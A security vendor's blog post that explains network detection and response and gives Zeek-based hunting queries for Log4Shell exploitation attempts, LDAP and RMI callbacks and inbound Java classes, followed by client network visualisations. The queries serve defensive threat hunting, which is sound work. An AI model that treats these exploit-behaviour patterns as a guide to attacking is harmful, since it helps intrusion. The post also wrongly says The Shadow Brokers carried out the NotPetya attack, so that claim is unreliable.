NDR: Network Detection and Response – Hunting for Log4j using NDR metadata
In mid-December 2021 a new Zero-day was made public - Log4Shell (CVE-2021-44228). The following post is a short summary of what NDR is and how it fits in an overall detection strategy and as a case study of hunting for the zero-day using available metadata.
What is Network Detection and Response (NDR)
Network Detection and Response (NDR) is a cybersecurity solution that continuously monitors an organization’s network to detect cyber threats and anomalous behavior using non-signature-based tools or techniques.
NDR approaches security challenges by applying machine learning and artificial intelligence to detect suspicious traffic on enterprise networks, utilizing both supervised and unsupervised learning methods for structured and unstructured data.
- Supervised machine learning identifies fundamental behaviors that are consistent across all variants of a threat.
- Unsupervised machine learning algorithms analyze enterprise data at scale and make billions of probability-based calculations based on the evidence that it sees. Instead of relying on knowledge of past threats, it independently classifies data and detects compelling patterns.
Source: Darktrace AI: Combining Unsupervised and Supervised Machine Learning
https://www.darktrace.com/es/resources/wp-machine-learning.pdf
Addressing IDS & IPS – Putting detection first
IPS and IDS have very different use cases and roles in the network.
Intrusion Detection Systems (IDS) have been a mainstay of information security for decades. Today, standalone IDS has been subsumed by Intrusion Prevention Systems (IPS), and the two are now known collectively as IDPS. This convergence occurred as the security industry focused more on preventing external threat actors, largely due to the lack of skilled security analysts able to make sense of the volumes of noise presented by IDS. In today’s threat landscape, where high-profile breaches are frequently reported in the news, prevention techniques alone are insufficient. Detecting and responding to hidden attacks that progress inside the cloud, data center, IT, and IoT networks must be a top priority.
To meet today’s challenges, NDR needs to understand the way attacks really work and how attackers succeed. The more sophisticated threat actors are often utilizing the tools available natively on the operating system without needing to rely on malware or exploits. NDR must adapt and reflect the true nature of the cloud, data center, IT, and IoT networks and their attack surfaces. Endpoints are dynamic and increasingly mobile, servers can be hosted inside the network or in the cloud, and security analysts have an increasingly difficult time with asset management and knowing where data resides.
IPS only provides protection against the most well-known attacks. It also creates a dangerous security gap between the time a threat is discovered in the wild and the time IPS can confidently respond.
NDR fills an important spot in an overall detection strategy, as shown by the image below which is based on Gartner's “SOC visibility triad”. Nixu NDR services rely on product market leaders and do now also provide 24/7 SOC integration, enabling customers with complete detection coverage, enhancing existing solutions, and furthering any investigation initiated either from EDR or elsewhere.
Source: Vectra – Intrusion Detection System (IDS): Definition and Explanation
https://www.vectra.ai/learning/intrusion-detection
Image adapted from Gartner's SOC Visibility Triad
Source: Gartner, Applying Network-Centric Approaches for Threat Detection and Response, Augusto Barros et al., March 18, 2019, ID G0037346
So, now that we got the basics sorted, let's have a look at one sample case from recent memory: CVE-2021-44228 – Log4Shell
The excerpt below is taken from me, Mikael Lindbäck, an analyst providing existing clients services using NDR for threat reporting & posture management that contributes to an organization's overall defense against cyber-attacks, detecting attack patterns or behaviors that may put an organization at risk.
How it started
Going back to mid-December 2021, a client asked – How fast can you create a detection for it?
Log4Shell (CVE-2021-44228) was a zero-day vulnerability in Log4j, a popular Java logging framework, which had just started making its rounds around Twitter and the infosec community. The expectation was that the vulnerability would have far and wide consequences due to the widely adopted use of the logging framework.
Our internal Threat intelligence had picked up on the first overall methods used by the exploit and how each area in Nixu SOC could adjust detections or rules accordingly since the vulnerability was out in the open and no patch was available yet.
A detection rule for NDR was created and added to all customer environments. Then it hit me, again. The created detection rule does add an early “heads up”, but in general is not required. Since NDR relies on behavior patterns and known attacker techniques, the already built-in detection capabilities should trigger.
The modus of an attacker, regardless of known or unknown exploits, still remains through the cyber kill chain. The most common means for an attack include: exploiting a vulnerability to achieve a foothold, creating command channels for remote manipulation, escalating privileges, pivoting to internal network discovery, attempts to move laterally and further.
Since NDR relies on attacker behavior and known attacker techniques, the already built-in detection capabilities would trigger several detections over different phases.
How to give reassurance?
In dialogues with the customer, I began naming a wide range of detections that would likely trigger post exploitation.
In addition to network scanning activities, cryptocurrency mining was initially seen used as part of early successful Log4j exploits, continued with established C2 (Command and Control) communication, endpoints triggering alerts for either reconnaissance or lateral movement abusing whatever available tool such as RDP, RPC, old SMB1, or attempts of enumeration of internal IP ranges, ending up with alerts for data being sent to external domains, to name a few.
Although good efforts were made to try and reassure our client that we can rely on existing detection methods, a few of those mentioned above were not enough. We could only put the "creating additional rules" discussion at rest when conducting a hunt for all of the phases a Log4j abuser needs to go through in order to fulfill their attack cycle and active exploitation attempts. Sometimes “seeing is believing”, and we needed to show the client raw data on how the attack would look if it would have been successfully attempted.
Hunting using metadata
Our NDR product suites utilize ZEEK to capture and analyze network traffic and, with the added help from Nixu DFIR & Threat intelligence, we quickly created usable queries, parsing all available network metadata.
We could see all connections coming in during the exploit attempt phase. We also verified if we had any signs of successful exploits executed and searched for familiar communication methods that were known to be used with Log4j, such as ldap, ldaps, and RMI. Followed by verifying additional signs of C2 communication using then-known Java classes that were supposedly used in successful exploitation attempts.
While hunting for signs of exploitation of the Log4j vulnerability, we found signs of exploitation attempts targeting internet-facing servers. The application which was exposed on the servers was known to be vulnerable. This activity was only found using the queries and hypotheses created for the hunt.
As a personal touch, I like to use illustrations to get a better idea or understanding of all connections made as a result of a hunt. I use Gephi (an open-source visualizing tool) to illustrate the gathered data for all Log4J queries used. The images can be created, for example, by using 30 days of metadata with underlying queries such as "*jndi* *ldap*". Then the images can show a range of results "belonging" to separate clusters, such as client-initiated Nessus scanning to find vulnerable endpoints or actual Log4j exploit attempts.
We could also verify that the made attempts did not result in successful exploitation.
The initial hunt queries
Although the hunt is several months old, the same queries would still be viable.
Note: Depending on what tool you use for your ZEEK datasets, you may need to adjust the queries accordingly. The following examples are from Darktrace Advanced Search.
1. Exploit attempts.
An attacker sends a specially crafted message such as
- Using the queries below would yield results from different fields, with some queries being a bit narrower to avoid timeouts or some obfuscation attempts.
- *jndi* *ldap* (wildcard search for relevant fields)
- *${* AND @fields.local_orig:"false" (initiating strings)
- exists_:"@fields.user_agent" AND NOT @fields.source_ip:(10.* OR 192.168.* OR /fd00:.*/ OR /172\.1[6-9]\..+/ OR /172\.2[0-9]\..+/ OR /172\.3[0-1]\..+/)" (Then sort by user_agent, you may also want to remove any fields that you know are coming from company sources).
- The attempts made sometimes have a Base64 encoded string. You can decode the string that likely yields an IP. After that, it is recommended to verify if any external traffic to the decoded IP was successful with the following query.
- @fields.dest_ip:" insert.ip.here" OR @fields.dest_ip:" insert.ip.here"
- You may need to verify with @fields_conn state what type of reply you get, as anything other than “S0” (Connection attempt seen, no reply) would merit further review. Optionally, the “history” field has full visibility for the stages in the TCP handshake.)
- Live attempt samples
- Log4j uses encoding, obfuscation, and encryption to avoid the prevention and detection of IOC (Indicators of Compromise) -based rules. When evaluating possibilities of exploitation, all parameters of the request must be accounted for.
2. Successful exploitation
Let us disregard any possible detections that would happen at this stage or post exploitations for the already built-in NDR detection capabilities and only look at ZEEK log data.
Then let us assume that an attempted string is successful, which results in loading an external code class or message lookup and the execution of that code. This leads to a situation that is known as Remote Code Execution (RCE) initiating a remote connection. One example connection being made externally was initially thought to be over ldap (389), ldaps (636), or RMI (1099).
However, the ports used must not be the standard ports for either and can be seen in the initial payload (as shown in previous images containing the attempt). If there is no callback, the exploitation has likely failed.
- Search for default use of the ports. (NOTE: There will be false positives, and you will need to sort out likely benign traffic depending on what services your company provides or integrations you have)
- @type:"ldap" AND @fields.local_resp:"false" (external LDAP)
- @fields.dest_port:"1099" AND @fields.local_resp:"false" (external RMI default port)
- Other default ports to look for, as seen so far, would be 8180, 1389. But again, looking for IOC using only ports is unreliable due to the easy nature of specifying the port used in the initial command.
3. Established C2: Incoming commands
The malicious external endpoint would need to communicate back to the controlled infrastructure. One method Log4j uses is Java classes initiated from the external malicious endpoint. You could search for inbound Java classes with the following queries.
- *.class
- *class *java* AND @fields.local_orig:"false"
- Search for incoming LDAP connections
- @fields.type:"ldap" AND @fields.local_orig:"false"
- _exists_:”@fields.mime” *java*
To summarize
The hunt above gave early situational awareness to the customer, and now that Log4J is a few months away, it is still a reminder of how vulnerable we are, as Zero-day exploits are now more the norm than ever.
Also, knowing that working together with colleagues, experts in their respective areas, will give the much-needed information when quickly assessing just that particular event or any other in the future. This gives much reassurance when quickly creating or discussing potential detection rules.
As a final ending note, for anyone wanting to further their analysis of network metadata, I have a personal preference for using the open-source tool Gephi to create illustrations. I personally call them my "network Rorschach tests". Below are live samples from Client environments when given a scenario to hunt for using available data. Note: The examples below are unrelated to the Log4j hunt.
Each dot represents a host/IP, and each line represents a connection being made.
1. File upload destinations
The client wanted to know how SSH was used within the company together with external partners. The illustration below indicated two external sources continuously brute-forcing a company's internet-facing SFTP. Other connections were known and legitimate.
Result: the company now only works with whitelisted destinations.
2. Old protocols
The “NotPetya” malware attacks from 2017 are still fresh in recent memory. During the attacks, The Shadow Brokers (TSB) gained access to EternalBlue and used that exploit to target Ukrainian tax software, which also ended up accidentally affecting Maersk on a global scale. The exploit used a flaw in the old outdated SMBv1 protocol and the client wanted to know how widely it was used within the company network.
Result: The company now actively works to mitigate all use of SMBv1.
3. Network segmentation
The client had previously implemented network segmentation, separating areas in the network to restrict access with only jump stations to be used as a source for administrative access. The sample below illustrates a 7-day RDP summary.
Result: Network segmentation was not set up correctly. Also, different areas that were expected to be completely off-limits due to company policy/procedures were still being accessed.
4. All company IP's seen, Friday afternoon.
One client has a small office and was curious to see all concurrent connections visually.
The activity was not only “fun and games” but also prompted an inquiry into the more persistent connections as shown in the illustration.
Result: The client now lists previously unknown third-party software that regularly calls home with data for “its purpose”.